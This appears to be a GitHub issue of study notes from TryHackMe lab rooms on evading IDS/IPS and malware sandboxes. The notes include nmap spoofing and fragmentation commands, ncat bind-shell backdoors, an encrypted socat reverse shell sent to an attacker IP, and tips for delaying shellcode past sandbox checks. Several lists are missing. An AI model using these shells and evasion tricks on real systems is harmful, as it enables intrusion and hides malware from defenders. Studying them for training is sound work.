Open WDavid404 opened 7 months ago
Each IDS/IPS has a certain syntax to write its rules.
For netcat, you can use UDP using the option -u
For nmap, you can add the option -g PORT_NUMBER (or --source-port PORT_NUMBER) to make Nmap send all its traffic from a specific source port number.
nmap -sS -Pn -g 80 -F MACHINE_IP
to make the port scanning traffic appear to be exchanged with an HTTP server at first glance.
nmap -sU -Pn -g 53 -F MACHINE_IP
to make the traffic appear to be exchanged with a DNS server.
fragroute -f fragroute.conf HOST
Nmap makes it possible to create invalid packets in a variety of ways. In particular, two common options would be to scan the target using packets that have:
--badsum
--scanflags
lets you choose which flags you want to set.
- URG for Urgent
- ACK for Acknowledge
- PSH for Push
- RST for Reset
- SYN for Synchronize
- FIN for Finish
pentester@TryHackMe$ cat input.txt
ncat -lvnp 1234 -e /bin/bash
$ base64 input.txt
bmNhdCAtbHZucCAxMjM0IC1lIC9iaW4vYmFzaA==
pentester@TryHackMe$ urlencode ncat -lvnp 1234 -e /bin/bash
ncat%20-lvnp%201234%20-e%20%2Fbin%2Fbash
For example, you can use CyberChef to select and configure the Escape Unicode Characters recipe as shown in the image below.
Because an IDS/IPS won’t inspect encrypted data, an attacker can take advantage of encryption to evade detection. Unlike encoding, encryption requires an encryption key.
On the attacker system, we carried out the following:
pentester@TryHackMe$ openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.redteam.thm/O=Red Team THM/C=UK' -nodes -keyout thm-reverse.key -out thm-reverse.crt
Generating a RSA private key
........................++++
......++++
writing new private key to 'thm-reverse.key'
-----
pentester@TryHackMe$ ls
thm-reverse.crt thm-reverse.key
pentester@TryHackMe$ cat thm-reverse.key thm-reverse.crt > thm-reverse.pem
pentester@TryHackMe$ socat -d -d OPENSSL-LISTEN:4443,cert=thm-reverse.pem,verify=0,fork STDOUT
2022/02/24 13:39:07 socat[1208] W ioctl(6, IOCTL_VM_SOCKETS_GET_LOCAL_CID, ...): Inappropriate ioctl for device
2022/02/24 13:39:07 socat[1208] N listening on AF=2 0.0.0.0:4443
On the victim machine
pentester@target$ socat OPENSSL:10.20.30.129:4443,verify=0 EXEC:/bin/bash
In many cases, you can use source routing to force the packets to use a certain route to reach their destination. Nmap provides this feature using the option --ip-options
nmap -sS HTTP://PROXY_HOST1:8080,SOCKS4://PROXY_HOST2:4153 MACHINE_IP.
This way, you would make your scan go through HTTP proxy host1, then SOCKS4 proxy host2, before reaching your target.
It is important to note that finding a reliable proxy requires some trial and error before you can rely on it to hide your Nmap scan source.
Consequently, you might find it beneficial if you can:
Pentesting frameworks, such as Cobalt Strike and Empire, offer malleable Command and Control (C2) profiles. These profiles allow various fine-tuning to evade IDS/IPS systems. If you are using such a framework, it is worth creating a custom profile instead of relying on a default one. Examples variables you can control include the following:
Next-Generation Network IPS (NGNIPS) has the following five characteristics according to Gartner:
In this room, we group Nmap techniques into three groups:
Nmap allows you to hide or spoof the source as you can use:
Using the -D option
, you can add decoy source IP addresses to confuse the target. Consider the following command, nmap -sS -Pn -D 10.10.10.1,10.10.10.2,ME -F MACHINE_IP
set Nmap to use random source IP addresses instead of explicitly specifying them. By running nmap -sS -Pn -D RND,RND,ME -F MACHINE_IP
nmap -sS -Pn --proxies PROXY_URL -F MACHINE_IP
option --spoof-mac MAC_ADDRESS
spoofing the MAC address works only if your system is on the same network segment as the target host. The target system is going to reply to a spoofed MAC address
-S IP_ADDRESS
Spoofing the IP address is useful if your system is on the same subnetwork as the target host;
otherwise, you won’t be able to read the replies sent back.
using -g or --source-port options: nmap -sS -Pn -g 8080 -F MACHINE_IP
-f option: This option will fragment the IP packet to carry only 8 bytes of data: nmap -sS -Pn -f -F MACHINE_IP
option is the -ff
--mtu VALUE
specifies the number of bytes per IP packet. In other words, the IP header size is not included. The value set for MTU must always be a multiple of 8.
nmap -sS -Pn --data-length 64 -F MACHINE_IP
Evasion Approach | Nmap Argument |
---|---|
Set IP time-to-live field | --ttl VALUE |
Send packets with specified IP options | --ip-options OPTIONS |
Send packets with a wrong TCP/UDP checksum | --badsum |
e.g.
nmap -sS -Pn --ttl 81 -F MACHINE_IP
nmap -sS -Pn --badsum -F MACHINE_IP
Port hopping is a technique where an application hops from one port to another till it can establish and maintain a connection. In other words, the application might try different ports till it can successfully establish a connection.
Port tunneling is also known as port forwarding and port mapping.
ncat -lvnp 443 -c "ncat TARGET_SERVER 25"
ncat -lvnp PORT_NUMBER -e /bin/bash
will create a backdoor via the specified port number that lets you interact with the Bash shell.
One of the most creative and effective ways that Blue Teamers have come up with to analyze suspicious-looking files is in the category of Dynamic Analysis. This method involves running the file in a containerized (or virtualized) environment; This environment is referred to as a Sandbox. Depending on the sandbox of choice, you may be able to customize what version of Windows is running, the software installed on the machine, and much more.
There are various vendors that make various Sandbox products that Blue Teamers may be able to deploy in a corporate network. Here are some popular examples:
Four broad categories:
Malware Sandboxes are often limited to a time constraint to prevent the overallocation of resources, which may increase the Sandboxes queue drastically. This is a crucial aspect that we can abuse; if we know that a Sandbox will only run for five minutes at any given time, we can implement a sleep timer that sleeps for five minutes before our shellcode is executed.
One defining factor of Sandboxes is that they are often located off-premise and are hosted by Anti-Virus providers. If you know you are attacking TryHackMe, a European company, and your binary is executed in California, you can make an educated guess that the binary has ended up in a Sandbox.
You may choose to implement a geolocation filter on your program that checks if the IP Address block is owned by the company you are targeting or if it is from a residential address space. There are several services that you can use to check this information:
Another incredibly popular method is to observe system information. Most Sandboxes typically have reduced resources. A popular Malware Sandbox service, Any.Run, only allocates 1 CPU core and 4GB of RAM per virtual machine. you can expect more than 2 CPU cores per system and more than 4GB of RAM. Knowing this, we can tailor our code to query for basic system info (CPU core count, RAM amount, Disk size, etc).
it involves querying information about the Active Directory domain.
Almost no Malware Sandboxes are joined in a domain, so it's relatively safe to assume if the machine is not joined to a domain, it is not the right target! However, you cannot always be too sure, so you should collect some information about the domain to be safe. There are many objects that you can query; here are some to consider:
These techniques can vary in difficulty; therefore, you should consider how much time and effort you want to spend building out these evasion methods. A simple method, such as checking the systems environment variables (this can be done with echo %VARIABLE% or to display all variables, use the set command) for an item like the LogonServer, LogonUserSid, or LogonDomain may be much easier than implementing a Windows API.
IDS